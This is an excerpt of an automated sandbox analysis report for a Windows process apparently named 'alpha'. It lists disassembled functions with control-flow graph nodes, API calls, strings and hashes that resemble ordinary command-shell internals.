                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                          • API String ID: 1049357271-3021193919
                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction ID: e1fbb0b33235ad749c17925de57da7012b0827dccbeddb00b0dae7ab746efb01
                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction Fuzzy Hash: A6C14071E0BB43B6EA049B21E9141B9B7A1FF89B91F548135D90EC77A1DF3CE449A340
                                                                                          Function 00007FF6A0E83C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 732 7ff6a0e83c24-7ff6a0e83c61 733 7ff6a0e83c67-7ff6a0e83c99 call 7ff6a0e7af14 call 7ff6a0e7ca40 732->733 734 7ff6a0e8ec5a-7ff6a0e8ec5f 732->734 743 7ff6a0e8ec97-7ff6a0e8eca1 call 7ff6a0e8855c 733->743 744 7ff6a0e83c9f-7ff6a0e83cb2 call 7ff6a0e7b900 733->744 734->733 736 7ff6a0e8ec65-7ff6a0e8ec6a 734->736 738 7ff6a0e8412e-7ff6a0e8415b call 7ff6a0e88f80 736->738 744->743 749 7ff6a0e83cb8-7ff6a0e83cbc 744->749 750 7ff6a0e83cbf-7ff6a0e83cc7 749->750 750->750 751 7ff6a0e83cc9-7ff6a0e83ccd 750->751 752 7ff6a0e83cd2-7ff6a0e83cd8 751->752 753 7ff6a0e83cda-7ff6a0e83cdf 752->753 754 7ff6a0e83ce5-7ff6a0e83d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff6a0e83faa-7ff6a0e83fb3 753->755 756 7ff6a0e83fb8 754->756 757 7ff6a0e83d68-7ff6a0e83d6c 754->757 755->752 759 7ff6a0e83fc6-7ff6a0e83fec GetLastError call 7ff6a0e8855c call 7ff6a0e8a5d6 756->759 757->756 758 7ff6a0e83d72-7ff6a0e83dcd towupper GetFullPathNameW 757->758 758->759 760 7ff6a0e83dd3-7ff6a0e83ddd 758->760 763 7ff6a0e83ff1-7ff6a0e84007 call 7ff6a0e8855c _local_unwind 759->763 762 7ff6a0e83de3-7ff6a0e83dfb 760->762 760->763 765 7ff6a0e83e01-7ff6a0e83e11 762->765 766 7ff6a0e840fe-7ff6a0e84119 call 7ff6a0e8855c _local_unwind 762->766 774 7ff6a0e8400c-7ff6a0e84022 GetLastError 763->774 765->766 770 7ff6a0e83e17-7ff6a0e83e28 765->770 775 7ff6a0e8411a-7ff6a0e8412c call 7ff6a0e7ff70 call 7ff6a0e8855c 766->775 773 7ff6a0e83e2c-7ff6a0e83e34 770->773 773->773 776 7ff6a0e83e36-7ff6a0e83e3f 773->776 777 7ff6a0e84028-7ff6a0e8402b 774->777 778 7ff6a0e83e95-7ff6a0e83e9c 774->778 775->738 782 7ff6a0e83e42-7ff6a0e83e55 776->782 777->778 783 7ff6a0e84031-7ff6a0e84047 call 7ff6a0e8855c _local_unwind 777->783 779 7ff6a0e83ecf-7ff6a0e83ed3 778->779 780 7ff6a0e83e9e-7ff6a0e83ec2 call 7ff6a0e82978 778->780 785 7ff6a0e83f08-7ff6a0e83f0b 779->785 786 7ff6a0e83ed5-7ff6a0e83ef7 GetFileAttributesW 779->786 792 7ff6a0e83ec7-7ff6a0e83ec9 780->792 788 7ff6a0e83e57-7ff6a0e83e60 782->788 789 7ff6a0e83e66-7ff6a0e83e8f GetFileAttributesW 782->789 799 7ff6a0e8404c-7ff6a0e84062 call 7ff6a0e8855c _local_unwind 783->799 796 7ff6a0e83f0d-7ff6a0e83f11 785->796 797 7ff6a0e83f1e-7ff6a0e83f40 SetCurrentDirectoryW 785->797 793 7ff6a0e83efd-7ff6a0e83f02 786->793 794 7ff6a0e84067-7ff6a0e84098 GetLastError call 7ff6a0e8855c _local_unwind 786->794 788->789 798 7ff6a0e83f9d-7ff6a0e83fa5 788->798 789->774 789->778 792->779 792->799 793->785 801 7ff6a0e8409d-7ff6a0e840b3 call 7ff6a0e8855c _local_unwind 793->801 794->801 803 7ff6a0e83f46-7ff6a0e83f69 call 7ff6a0e8498c 796->803 804 7ff6a0e83f13-7ff6a0e83f1c 796->804 797->803 805 7ff6a0e840b8-7ff6a0e840de GetLastError call 7ff6a0e8855c _local_unwind 797->805 798->782 799->794 801->805 815 7ff6a0e840e3-7ff6a0e840f9 call 7ff6a0e8855c _local_unwind 803->815 816 7ff6a0e83f6f-7ff6a0e83f98 call 7ff6a0e8417c 803->816 804->797 804->803 805->815 815->766 816->775
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                          • String ID: :
                                                                                          • API String ID: 1809961153-336475711
                                                                                          • Opcode ID: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                          • Instruction ID: b8a44fdce79a4800a4894f883ad31d0925d64bf8fe5ab330c41f98648fe6d147
                                                                                          • Opcode Fuzzy Hash: 9a6838553337d10caea9482eb8d4b87fb6c3f53a5735761c353ac2a4c5941523
                                                                                          • Instruction Fuzzy Hash: 81D15272B0EB87A1EA64DB25E4542BAB7A1FF84740F444136EA4E837A5DF3CE548D700
                                                                                          Function 00007FF6A0E82394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 914 7ff6a0e82394-7ff6a0e82416 memset call 7ff6a0e7ca40 917 7ff6a0e8241c-7ff6a0e82453 GetModuleFileNameW call 7ff6a0e8081c 914->917 918 7ff6a0e8e0d2-7ff6a0e8e0da call 7ff6a0e84c1c 914->918 923 7ff6a0e82459-7ff6a0e82468 call 7ff6a0e8081c 917->923 924 7ff6a0e8e0db-7ff6a0e8e0ee call 7ff6a0e8498c 917->924 918->924 929 7ff6a0e8e0f4-7ff6a0e8e107 call 7ff6a0e8498c 923->929 930 7ff6a0e8246e-7ff6a0e8247d call 7ff6a0e8081c 923->930 924->929 937 7ff6a0e8e10d-7ff6a0e8e123 929->937 935 7ff6a0e82516-7ff6a0e82529 call 7ff6a0e8498c 930->935 936 7ff6a0e82483-7ff6a0e82492 call 7ff6a0e8081c 930->936 935->936 936->937 947 7ff6a0e82498-7ff6a0e824a7 call 7ff6a0e8081c 936->947 940 7ff6a0e8e13f-7ff6a0e8e17a _wcsupr 937->940 941 7ff6a0e8e125-7ff6a0e8e139 wcschr 937->941 945 7ff6a0e8e181-7ff6a0e8e199 wcsrchr 940->945 946 7ff6a0e8e17c-7ff6a0e8e17f 940->946 941->940 944 7ff6a0e8e27c 941->944 948 7ff6a0e8e283-7ff6a0e8e29b call 7ff6a0e8498c 944->948 950 7ff6a0e8e19c 945->950 946->950 955 7ff6a0e824ad-7ff6a0e824c5 call 7ff6a0e83c24 947->955 956 7ff6a0e8e2a1-7ff6a0e8e2c3 _wcsicmp 947->956 948->956 953 7ff6a0e8e1a0-7ff6a0e8e1a7 950->953 953->953 957 7ff6a0e8e1a9-7ff6a0e8e1bb 953->957 963 7ff6a0e824ca-7ff6a0e824db 955->963 959 7ff6a0e8e1c1-7ff6a0e8e1e6 957->959 960 7ff6a0e8e264-7ff6a0e8e277 call 7ff6a0e81300 957->960 961 7ff6a0e8e1e8-7ff6a0e8e1f1 959->961 962 7ff6a0e8e21a 959->962 960->944 965 7ff6a0e8e201-7ff6a0e8e210 961->965 966 7ff6a0e8e1f3-7ff6a0e8e1f6 961->966 969 7ff6a0e8e21d-7ff6a0e8e21f 962->969 967 7ff6a0e824dd-7ff6a0e824e4 ??_V@YAXPEAX@Z 963->967 968 7ff6a0e824e9-7ff6a0e82514 call 7ff6a0e88f80 963->968 965->962 971 7ff6a0e8e212-7ff6a0e8e218 965->971 966->965 970 7ff6a0e8e1f8-7ff6a0e8e1ff 966->970 967->968 969->948 973 7ff6a0e8e221-7ff6a0e8e228 969->973 970->965 970->966 971->969 975 7ff6a0e8e254-7ff6a0e8e262 973->975 976 7ff6a0e8e22a-7ff6a0e8e231 973->976 975->944 977 7ff6a0e8e234-7ff6a0e8e237 976->977 977->975 978 7ff6a0e8e239-7ff6a0e8e242 977->978 978->975 979 7ff6a0e8e244-7ff6a0e8e252 978->979 979->975 979->977
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                          • API String ID: 2622545777-4197029667
                                                                                          • Opcode ID: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                          • Instruction ID: d4e3c3a7c48bde46850cd103560d19cf9a672123c12e4b060ae0efd296dd3108
                                                                                          • Opcode Fuzzy Hash: 9e052dd8a569df61deb78e5422594237265ab7758b060a59aba3d98d3c4be830
                                                                                          • Instruction Fuzzy Hash: 9E917071B0BB83A6EF249B60D8642B967A5FF88B85F544135C90E877A5DF3CE509E300
                                                                                          Function 00007FF6A0E80580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                          • String ID: CMD.EXE
                                                                                          • API String ID: 1606018815-3025314500
                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                          • Instruction ID: 13592d1b1fc6219afe5a667f5be2c6ddea4e6fd0ee6c223e246dda490559e1cc
                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                          • Instruction Fuzzy Hash: A141B135A0BB83ABE7544B24E855178BBA0FF8EB62F959175D90EC3361DF3CA404A710
                                                                                          Function 00007FF6A0E7C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 992 7ff6a0e7c620-7ff6a0e7c66f GetConsoleTitleW 993 7ff6a0e8c5f2 992->993 994 7ff6a0e7c675-7ff6a0e7c687 call 7ff6a0e7af14 992->994 996 7ff6a0e8c5fc-7ff6a0e8c60c GetLastError 993->996 999 7ff6a0e7c689 994->999 1000 7ff6a0e7c68e-7ff6a0e7c69d call 7ff6a0e7ca40 994->1000 998 7ff6a0e8c5e3 call 7ff6a0e73278 996->998 1004 7ff6a0e8c5e8-7ff6a0e8c5ed call 7ff6a0e8855c 998->1004 999->1000 1000->1004 1005 7ff6a0e7c6a3-7ff6a0e7c6ac 1000->1005 1004->993 1007 7ff6a0e7c954-7ff6a0e7c95e call 7ff6a0e8291c 1005->1007 1008 7ff6a0e7c6b2-7ff6a0e7c6c5 call 7ff6a0e7b9c0 1005->1008 1013 7ff6a0e8c5de-7ff6a0e8c5e0 1007->1013 1014 7ff6a0e7c964-7ff6a0e7c96b call 7ff6a0e789c0 1007->1014 1015 7ff6a0e7c6cb-7ff6a0e7c6ce 1008->1015 1016 7ff6a0e7c9b5-7ff6a0e7c9b8 call 7ff6a0e85c6c 1008->1016 1013->998 1020 7ff6a0e7c970-7ff6a0e7c972 1014->1020 1015->1004 1018 7ff6a0e7c6d4-7ff6a0e7c6e9 1015->1018 1023 7ff6a0e7c9bd-7ff6a0e7c9c9 call 7ff6a0e8855c 1016->1023 1021 7ff6a0e8c616-7ff6a0e8c620 call 7ff6a0e8855c 1018->1021 1022 7ff6a0e7c6ef-7ff6a0e7c6fa 1018->1022 1020->996 1024 7ff6a0e7c978-7ff6a0e7c99a towupper 1020->1024 1025 7ff6a0e8c627 1021->1025 1022->1025 1026 7ff6a0e7c700-7ff6a0e7c713 1022->1026 1037 7ff6a0e7c9d0-7ff6a0e7c9d7 1023->1037 1029 7ff6a0e7c9a0-7ff6a0e7c9a9 1024->1029 1030 7ff6a0e8c631 1025->1030 1026->1030 1031 7ff6a0e7c719-7ff6a0e7c72c 1026->1031 1029->1029 1034 7ff6a0e7c9ab-7ff6a0e7c9af 1029->1034 1036 7ff6a0e8c63b 1030->1036 1035 7ff6a0e7c732-7ff6a0e7c747 call 7ff6a0e7d3f0 1031->1035 1031->1036 1034->1016 1038 7ff6a0e8c60e-7ff6a0e8c611 call 7ff6a0e9ec14 1034->1038 1047 7ff6a0e7c74d-7ff6a0e7c750 1035->1047 1048 7ff6a0e7c8ac-7ff6a0e7c8af 1035->1048 1042 7ff6a0e8c645 1036->1042 1040 7ff6a0e7c9dd-7ff6a0e8c6da SetConsoleTitleW 1037->1040 1041 7ff6a0e7c872-7ff6a0e7c8aa call 7ff6a0e8855c call 7ff6a0e88f80 1037->1041 1038->1021 1040->1041 1053 7ff6a0e8c64e-7ff6a0e8c651 1042->1053 1049 7ff6a0e7c76a-7ff6a0e7c76d 1047->1049 1050 7ff6a0e7c752-7ff6a0e7c764 call 7ff6a0e7bd38 1047->1050 1048->1047 1052 7ff6a0e7c8b5-7ff6a0e7c8d3 wcsncmp 1048->1052 1056 7ff6a0e7c773-7ff6a0e7c77a 1049->1056 1057 7ff6a0e7c840-7ff6a0e7c84b call 7ff6a0e7cb40 1049->1057 1050->1004 1050->1049 1052->1049 1058 7ff6a0e7c8d9 1052->1058 1059 7ff6a0e7c80d-7ff6a0e7c811 1053->1059 1060 7ff6a0e8c657-7ff6a0e8c65b 1053->1060 1065 7ff6a0e7c780-7ff6a0e7c784 1056->1065 1077 7ff6a0e7c84d-7ff6a0e7c855 call 7ff6a0e7cad4 1057->1077 1078 7ff6a0e7c856-7ff6a0e7c86c 1057->1078 1058->1047 1061 7ff6a0e7c817-7ff6a0e7c81b 1059->1061 1062 7ff6a0e7c9e2-7ff6a0e7c9e7 1059->1062 1060->1059 1067 7ff6a0e7ca1b-7ff6a0e7ca1f 1061->1067 1068 7ff6a0e7c821 1061->1068 1062->1061 1069 7ff6a0e7c9ed-7ff6a0e7c9f7 call 7ff6a0e8291c 1062->1069 1070 7ff6a0e7c83d 1065->1070 1071 7ff6a0e7c78a-7ff6a0e7c7a4 wcschr 1065->1071 1067->1068 1079 7ff6a0e7ca25-7ff6a0e8c6b3 call 7ff6a0e73278 1067->1079 1073 7ff6a0e7c824-7ff6a0e7c82d 1068->1073 1086 7ff6a0e7c9fd-7ff6a0e7ca00 1069->1086 1087 7ff6a0e8c684-7ff6a0e8c698 call 7ff6a0e73278 1069->1087 1070->1057 1075 7ff6a0e7c7aa-7ff6a0e7c7ad 1071->1075 1076 7ff6a0e7c8de-7ff6a0e7c8f7 1071->1076 1073->1073 1080 7ff6a0e7c82f-7ff6a0e7c837 1073->1080 1082 7ff6a0e7c7b0-7ff6a0e7c7b8 1075->1082 1083 7ff6a0e7c900-7ff6a0e7c908 1076->1083 1077->1078 1078->1037 1078->1041 1079->1004 1080->1065 1080->1070 1082->1082 1088 7ff6a0e7c7ba-7ff6a0e7c7c7 1082->1088 1083->1083 1089 7ff6a0e7c90a-7ff6a0e7c915 1083->1089 1086->1061 1094 7ff6a0e7ca06-7ff6a0e7ca10 call 7ff6a0e789c0 1086->1094 1087->1004 1088->1053 1095 7ff6a0e7c7cd-7ff6a0e7c7db 1088->1095 1096 7ff6a0e7c93a-7ff6a0e7c944 1089->1096 1097 7ff6a0e7c917 1089->1097 1094->1061 1111 7ff6a0e7ca16-7ff6a0e8c67f GetLastError call 7ff6a0e73278 1094->1111 1100 7ff6a0e7c7e0-7ff6a0e7c7e7 1095->1100 1103 7ff6a0e7ca2a-7ff6a0e7ca2f call 7ff6a0e89158 1096->1103 1104 7ff6a0e7c94a 1096->1104 1101 7ff6a0e7c920-7ff6a0e7c928 1097->1101 1106 7ff6a0e7c7e9-7ff6a0e7c7f1 1100->1106 1107 7ff6a0e7c800-7ff6a0e7c803 1100->1107 1108 7ff6a0e7c92a-7ff6a0e7c92f 1101->1108 1109 7ff6a0e7c932-7ff6a0e7c938 1101->1109 1103->1013 1104->1007 1106->1107 1112 7ff6a0e7c7f3-7ff6a0e7c7fe 1106->1112 1107->1042 1113 7ff6a0e7c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1004 1112->1100 1112->1107 1113->1059
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleTitlewcschr
                                                                                          • String ID: /$:
                                                                                          • API String ID: 2364928044-4222935259
                                                                                          • Opcode ID: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                                          • Instruction ID: e06543d5bb5c77c09212426f39243cc197a4159596bddd93863e3cde5feb2424
                                                                                          • Opcode Fuzzy Hash: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                                          • Instruction Fuzzy Hash: 91C1D172E0A643A1FA689B25D4143B962A5FF85B90F448139DA1EC73D2EF3CE845F700
                                                                                          Function 00007FF6A0E88D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1171 7ff6a0e88d80-7ff6a0e88da2 1172 7ff6a0e88da4-7ff6a0e88daf 1171->1172 1173 7ff6a0e88db1-7ff6a0e88db4 1172->1173 1174 7ff6a0e88dcc 1172->1174 1175 7ff6a0e88dbf-7ff6a0e88dca Sleep 1173->1175 1176 7ff6a0e88db6-7ff6a0e88dbd 1173->1176 1177 7ff6a0e88dd1-7ff6a0e88dd9 1174->1177 1175->1172 1176->1177 1178 7ff6a0e88de7-7ff6a0e88def 1177->1178 1179 7ff6a0e88ddb-7ff6a0e88de5 _amsg_exit 1177->1179 1181 7ff6a0e88df1-7ff6a0e88e0a 1178->1181 1182 7ff6a0e88e46 1178->1182 1180 7ff6a0e88e4c-7ff6a0e88e54 1179->1180 1183 7ff6a0e88e73-7ff6a0e88e75 1180->1183 1184 7ff6a0e88e56-7ff6a0e88e69 _initterm 1180->1184 1185 7ff6a0e88e0e-7ff6a0e88e11 1181->1185 1182->1180 1186 7ff6a0e88e80-7ff6a0e88e88 1183->1186 1187 7ff6a0e88e77-7ff6a0e88e79 1183->1187 1184->1183 1188 7ff6a0e88e13-7ff6a0e88e15 1185->1188 1189 7ff6a0e88e38-7ff6a0e88e3a 1185->1189 1192 7ff6a0e88eb4-7ff6a0e88ec8 call 7ff6a0e837d8 1186->1192 1193 7ff6a0e88e8a-7ff6a0e88e98 call 7ff6a0e894f0 1186->1193 1187->1186 1190 7ff6a0e88e17-7ff6a0e88e1b 1188->1190 1191 7ff6a0e88e3c-7ff6a0e88e41 1188->1191 1189->1180 1189->1191 1194 7ff6a0e88e2d-7ff6a0e88e36 1190->1194 1195 7ff6a0e88e1d-7ff6a0e88e29 1190->1195 1197 7ff6a0e88f28-7ff6a0e88f3d 1191->1197 1199 7ff6a0e88ecd-7ff6a0e88eda 1192->1199 1193->1192 1201 7ff6a0e88e9a-7ff6a0e88eaa 1193->1201 1194->1185 1195->1194 1203 7ff6a0e88ee4-7ff6a0e88eeb 1199->1203 1204 7ff6a0e88edc-7ff6a0e88ede exit 1199->1204 1201->1192 1205 7ff6a0e88ef9 1203->1205 1206 7ff6a0e88eed-7ff6a0e88ef3 _cexit 1203->1206 1204->1203 1205->1197 1206->1205
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                          • String ID:
                                                                                          • API String ID: 4291973834-0
                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                          • Instruction ID: 7e78bba95abaca0db11812cda2f2204c227f555a0537cf74ebf385dc65f9b8f2
                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                          • Instruction Fuzzy Hash: 2841D831E0E687A6F7549B10EA4027562B1BF58346F644436E95EC77A0DF7CE848E740
                                                                                          Function 00007FF6A0E789C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
